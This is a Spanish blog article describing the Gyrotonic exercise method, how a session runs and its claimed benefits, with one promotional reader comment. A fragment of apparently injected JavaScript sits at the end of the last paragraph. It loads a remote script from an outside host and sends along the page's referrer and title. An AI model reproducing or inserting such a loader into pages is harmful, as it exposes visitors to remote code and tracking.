Salud y belleza » Deportes

¿Qué es el “Gyrotonic”?

1 Comentario

No hace mucho tiempo que el término “Gyrotonic” ha comenzado a volverse famoso, especialmente en el circuito de la preparación física y la labor de gimnasia. La práctica fue concebida gracias a un tal Juliu Horvath: a él se le debe el gusto de este ejercicio físico que combina dicho ejercicio con el uso de sillas giratorias. ¿Cómo? Efectivamente JH descubrió los beneficios del que sería su “Gyrotonic” al aplicar movimientos de esfuerzo justamente valiéndose de un par de aparatos de ese tipo.

Esta práctica, que tiene más de treinta años pero que en esta parte de Europa se ha hecho famosa hace poco tiempo, combina principios y movimientos de la danza, el yoga, el tai-chi, la natación y la gimnasia.

La meta del Gyrotonic, según propias palabras de su creador, es lograr que el hombre se entrene para, luego, al momento de desarrollar sus tareas cotidianas, no tenga problemas físicos ni sienta las exigencias. Para ello, el Gyrotonic ejercita especialmente zonas como la columna vertebral y presta vital importancia a operaciones como la respiración.

Pero, ¿cómo se desarrolla una sesión de Gyrotonic?. Justamente así…

  1. La clase arranca, como todo esfuerzo deportivo, con un período de calentamiento previo (sencillo, leve, no más de diez minutos).
  2. Luego comienza la mecánica del Gyrotonic mediante un ejercicio de auto-masajes que sigue la corriente del calentamiento.
  3. Se continúa con algunos trabajos sobre esas famosas y prácticas sillas bajas: el objetivo en esta parte de la clase es ejercitar la espina dorsal (mediante arqueamientos, estiramientos y demás posturas propias del método).
  4. Poco a poco se aumenta la complejidad: se varían los giros recorriendo así diferentes músculos del cuerpo para intentar un trabajo completo. Conforme corre la clase, la labor se vuelve más cargada y compleja
  5. Para finalizar, se cierra la clase como se empezó: con ejercicios sencillos y livianos para ir relajando el cuerpo.

Entre las bondades del método Gyrotonic se destacan algunas de las siguientes: reduce las chances de padecer algún tipo de lesión (especialmente las musculares); mejora la elasticidad del cuerpo, libera las articulaciones; es un sistema que beneficia las funciones motoras; ayuda a aumentar la fuerza y control muscular; favorece la relajación; es fructífero para el cuidado de los huesos.

Actualmente, en España cada vez son más los centros que ofrecen esta actividad entre muchas otras opciones para trabajar el cuerpo. Las clases, como se vio, presentan opciones para que puedan ser practicadas por mujeres y hombres y la edad para nada es un impedimento. Como vemos, un gran opción para trabajar el cuerpo.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , , ,

One Comment »

  • Training Studio said:

    Si buscas tu Centro de Gyrotonic en Madrid visítenos en Conde Orgaz, Un sitio exclusivo con lo último en maquinas para realizar todos los ejercicios. Con un personal cualificado. Ven y la primera sesión será Gratis.

    Training Studio Madrid

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.